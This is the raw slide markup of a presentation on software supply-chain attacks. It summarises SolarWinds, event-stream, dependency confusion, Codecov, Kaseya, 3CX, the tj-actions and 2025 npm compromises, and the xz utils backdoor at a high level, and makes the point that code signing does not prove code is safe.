        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6419088" y="27614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Hide in DNS</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="17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7A6A3024-7A6C-B1B5-5E39-189918A596C3}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6419088" y="3264408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Command &amp; control ran over DNS to avsvmcloud.com.</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1350" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="19" name="st3">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{C341C4ED-DFBF-C41E-65E8-062E2A655859}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="8970264" y="1892808"/>
            <a:ext cx="2615184" cy="3017520"/>
          </a:xfrm>
          <a:prstGeom prst="roundRect">
            <a:avLst>
              <a:gd name="adj" fmla="val 3147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712089C-E351-4023-9FB4-2B45911C3810}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="9226296" y="2167128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743BC250-B2EA-2E9D-6989-23AA04D6C020}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="9226296" y="216712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6F7F1601-5DA1-4E3D-D56A-86C60267918D}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="9226296" y="276148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Pick targets</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="17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4E518069-8503-DBAB-6116-378C1188F020}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="9226296" y="3264408"/>
            <a:ext cx="2103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Of ~18,000 infected, only ~100 companies &amp; ~9 US federal agencies were actively exploited.</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="135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D546B714-4B3D-7038-CB43-52E52385BE07}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="640080" y="54406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Discovered only in December 2020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when FireEye investigated the theft of its own red-team tools. Victims included Treasury, Commerce, DHS, Microsoft and FireEye.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412328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4683B7BE-928B-0AB9-5E4B-3C17EBA034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1378B72-B9D0-F2BE-44B0-F6C7C2671A67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one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lesson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from SolarWinds</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="3000" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="k0">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{81140A38-140E-86CC-153C-B8A08DAB6CA2}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="548640" y="1664208"/>
            <a:ext cx="3566160" cy="1554480"/>
          </a:xfrm>
          <a:prstGeom prst="roundRect">
            <a:avLst>
              <a:gd name="adj" fmla="val 5294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F806C04-B71D-5C14-7242-27813921B67F}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="54864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~18,000</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="4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D4ABCF4B-E10F-F51C-0A7D-154A5372A7B1}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="548640" y="265176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installed the update</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1350" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="6" name="k1">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{6D483C2F-EAD9-4D24-DF60-9540240A2E45}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4297680" y="1664208"/>
            <a:ext cx="3566160" cy="1554480"/>
          </a:xfrm>
          <a:prstGeom prst="roundRect">
            <a:avLst>
              <a:gd name="adj" fmla="val 5294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435B71F-318E-8FD3-9026-19A2F5BC81A8}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="429768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~100</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="40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48BEF3C-B619-ADC8-0819-C6CFF0D6BE7F}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4297680" y="265176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actively exploited</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1350" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="9" name="k2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{BA015867-CF8E-EE4D-0998-A708D587DC2D}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="8046720" y="1664208"/>
            <a:ext cx="3566160" cy="1554480"/>
          </a:xfrm>
          <a:prstGeom prst="roundRect">
            <a:avLst>
              <a:gd name="adj" fmla="val 5294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4C3DCA9-2307-74E9-F93D-576882985F9D}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="8046720" y="182880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9</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="40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597CDBDB-B1CE-1810-5965-AA053BCCE72A}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="8046720" y="265176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 federal agencies</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1350" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="12" name="quote">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{C4B3550B-9928-DA34-78D6-F2F03930643C}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="548640" y="3977640"/>
            <a:ext cx="11064240" cy="1783080"/>
          </a:xfrm>
          <a:prstGeom prst="roundRect">
            <a:avLst>
              <a:gd name="adj" fmla="val 461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0041820-1BB0-912A-93A4-0691E5E16159}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="914400" y="4160520"/>
            <a:ext cx="103327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signature proves who </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2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built</a:t>
            </a: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the code.</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="28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does </a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="280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2800" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF6B6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</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="28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prove the code is safe.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8462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B93DB1B3-75F1-0762-A8AA-590E44EA3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645D7465-5931-F2B5-9BCC-D0A48A356308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This keeps happening — a short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gallery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91468FF-054B-A481-C844-4B74A8E9A202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DIFFERENT VECTORS, SAME PATTERN: TRUST, ABUSED</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1200" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="g0">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{5CD71579-B1B3-7B0F-1349-702380281EDE}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="548640" y="1618488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AECA4BB-AD0D-CE88-FD9A-8455B4ED441D}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="749808" y="1764792"/>
            <a:ext cx="3163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event-stream  </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="14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2018</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="14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F2CE637-ADAB-E4C5-12CA-F42158C8A91F}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="749808" y="2148840"/>
            <a:ext cx="3163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Maintainer hands the project to a “volunteer” who adds a dependency targeting Copay bitcoin wallets.</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1180" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="7" name="g1">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{54FEDB9F-BE77-228A-0AA9-6A1688E6DDD5}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4297680" y="1618488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1877A91-33B9-8983-8941-0721A2D8C112}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4498848" y="1764792"/>
            <a:ext cx="3163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Dependency confusion  </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="14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2021</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="145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66F3560-7830-A845-36B5-1B0EFE1174A4}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4498848" y="2148840"/>
            <a:ext cx="3163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Alex Birsan publishes public packages named like Apple / Microsoft / PayPal internal ones — package managers prefer them.</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1180" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="10" name="g2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{FB004D6A-CCD6-591B-6462-84A3D30B0737}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="8046720" y="1618488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F54AD80-79E1-8EA3-BBFB-958231E281D2}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="8247888" y="1764792"/>
            <a:ext cx="3163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Codecov  </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="14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2021</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="14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5388B02E-46F3-BF8F-FC96-C11A799B4281}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="8247888" y="2148840"/>
            <a:ext cx="3163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modified bash uploader quietly steals secrets out of CI environments.</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1180" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="13" name="g3">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{69DE6B7B-ABFF-35ED-F3F2-3C8983D0D1FC}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="548640" y="3429000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4B2D15F-92B4-A4EA-6B18-71FB6C10E486}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="749808" y="3575304"/>
            <a:ext cx="3163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Kaseya VSA  </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="14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2021</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="14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5D9877E-8327-CFA0-036D-220769E09FEB}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="749808" y="3959352"/>
            <a:ext cx="3163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REvil hits an MSP tool and ~1,500 businesses downstream get ransomware.</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1180" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="16" name="g4">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{234DC417-49F8-763E-0A9B-0C1BA07E8F81}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4297680" y="3429000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1216CF0E-7F89-A995-C2FD-6511721C732A}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4498848" y="3575304"/>
            <a:ext cx="3163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3CX  </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="14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2023</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="145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8CB5245-B215-4B6C-E389-16C4C1E03661}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4498848" y="3959352"/>
            <a:ext cx="3163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first known “double” supply chain attack — compromised X_TRADER leads to compromised 3CX.</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1180" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="19" name="g5">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{7CA22936-FB40-53DA-43B1-102B340F67A5}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="8046720" y="3429000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FAFD3ECD-DD56-2995-2746-1E4D5DEBC315}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="8247888" y="3575304"/>
            <a:ext cx="31638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tj-actions/changed-files  </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="14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2025</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1450" dirty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BADCDC53-A94A-7291-87F6-0CAC9E7298AE}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="8247888" y="3959352"/>
            <a:ext cx="316382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compromised GitHub Action leaks secrets into the logs of thousands of repos.</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1180" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="4113595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ECB031A6-8DCF-E792-DA11-2B885D34C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4B7DDCA-4A21-4555-381E-7B080749F3F2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September 2025 — it got personal for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npm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32D1885-B0C6-69DE-CC1F-1557E4E7EA2E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BILLIONS OF WEEKLY DOWNLOADS, ONE PHISHED MAINTAINER</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1200" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="a">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{71016BBF-386C-19FA-80B1-0B9B18D4DBBA}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="548640" y="1755648"/>
            <a:ext cx="5440680" cy="3657600"/>
          </a:xfrm>
          <a:prstGeom prst="roundRect">
            <a:avLst>
              <a:gd name="adj" fmla="val 2250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245E2C3-4DAC-6231-6C9F-FE45BE179D73}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="822960" y="19202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phish</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="18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DD5D7ED-5E40-B790-364C-EA12307B5BE2}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="822960" y="237744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phishing attack against a maintainer compromised </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="155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chalk, debug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and others — packages with </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="15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billions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of weekly downloads.</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1550" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="7" name="b">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{B7DB7E41-A1BB-3ADD-E914-2916B435F7A2}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6172200" y="1755648"/>
            <a:ext cx="5440680" cy="3657600"/>
          </a:xfrm>
          <a:prstGeom prst="roundRect">
            <a:avLst>
              <a:gd name="adj" fmla="val 2250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DA99E45-4AC6-C075-4A79-E92E745A9247}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6446520" y="192024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Shai-Hulud — the worm</a:t>
            </a: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D3C3E48-BC17-7CBE-645D-864381D68CA4}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6446520" y="2377440"/>
            <a:ext cx="49377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Soon after came a </a:t>
            </a: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self-replicating worm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: it steals npm tokens, then uses them to publish infected versions of </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="15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more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packages — spreading on its own.</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="155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B19429E-AD81-E840-4AAA-1199DAC905A4}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="640080" y="54406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stolen token in an automated ecosystem is not one breach — it is a chain reaction.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643305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FEC40A13-682A-589E-E6C7-642EF9491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D7DB739-407B-8AB4-6A50-225E96E4B8FF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xz utils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2024 — the thriller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10E932C-5723-F0F4-0274-8C67CD2766B5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CVE-2024-3094  ·  CAUGHT BY A 500 MS DELAY</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1200" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="story">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{8148ED03-1792-C640-611E-D87CC53AF2EE}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="548640" y="1755648"/>
            <a:ext cx="6583680" cy="3703320"/>
          </a:xfrm>
          <a:prstGeom prst="roundRect">
            <a:avLst>
              <a:gd name="adj" fmla="val 2222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631A970E-4961-A56B-D9A9-7B0CE4796B0F}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="914400" y="2084832"/>
            <a:ext cx="146304" cy="146304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96B9C37B-3CB6-8688-050B-13C261BBEB3A}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1207008" y="1965960"/>
            <a:ext cx="5715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Years of patience  —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“Jia Tan” spends years building trust in an open-source project, through social engineering.</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="140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6629764-3D62-EDB0-FA1A-572A6D550645}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="914400" y="2926080"/>
            <a:ext cx="146304" cy="146304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70B01F4-4B4F-9222-BD08-2A38046A3404}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1207008" y="2807208"/>
            <a:ext cx="5715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handover  —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Eventually granted maintainer rights — and plants a backdoor targeting sshd.</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="140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DB5348F6-56D4-FBF8-EAE9-73976FF2D6B7}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="914400" y="3767328"/>
            <a:ext cx="146304" cy="146304"/>
          </a:xfrm>
          <a:prstGeom prst="ellipse">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="C9D6F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6AFB3EA-C824-55BC-53CC-762DAB39BB15}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1207008" y="3648456"/>
            <a:ext cx="5715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accident  —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Andres Freund notices SSH logins are ~500 ms slower than they should be. He digs in.</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="140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D6746841-1BAC-93AD-7002-E2F574F8F15F}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="914400" y="4608576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EF4E712-24EE-DAAC-9C0F-3BBB50A00044}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1207008" y="4489704"/>
            <a:ext cx="57150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Caught  —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One engineer’s curiosity stops a backdoor that was days from reaching the world’s Linux servers.</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1400" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="13" name="stat">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{E862A630-B30E-A7E7-58A3-C7C958B913B3}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7315200" y="1755648"/>
            <a:ext cx="4297680" cy="3703320"/>
          </a:xfrm>
          <a:prstGeom prst="roundRect">
            <a:avLst>
              <a:gd name="adj" fmla="val 2222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12045731-4BC4-6237-E88A-6959F145205C}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7498080" y="2286000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6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~500 ms</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="46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54C408ED-D08A-5E2B-B46A-EE479BE04512}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7498080" y="320040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entire attack was caught</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="14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because SSH felt a little slow.</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="140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9235968-ADFD-32A5-5BBA-BB75E7E7DA58}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7498080" y="4343400"/>
            <a:ext cx="3931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We got lucky.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712160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254544B6-BA67-0754-5F68-3169D18A6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2A46705-5795-F176-60B5-A79B9C399A74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vectors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in one place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C3BDCB3-48D6-B3B4-CC82-502EEA52C21F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SAME GOAL — GET YOUR TRUST TO RUN THEIR CODE</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1200" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="v0">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{DF9539D8-D992-F265-4139-621D4ADBC55C}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="548640" y="1618488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F76F8A0-20B7-9C95-65C1-C518FC4F2B57}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
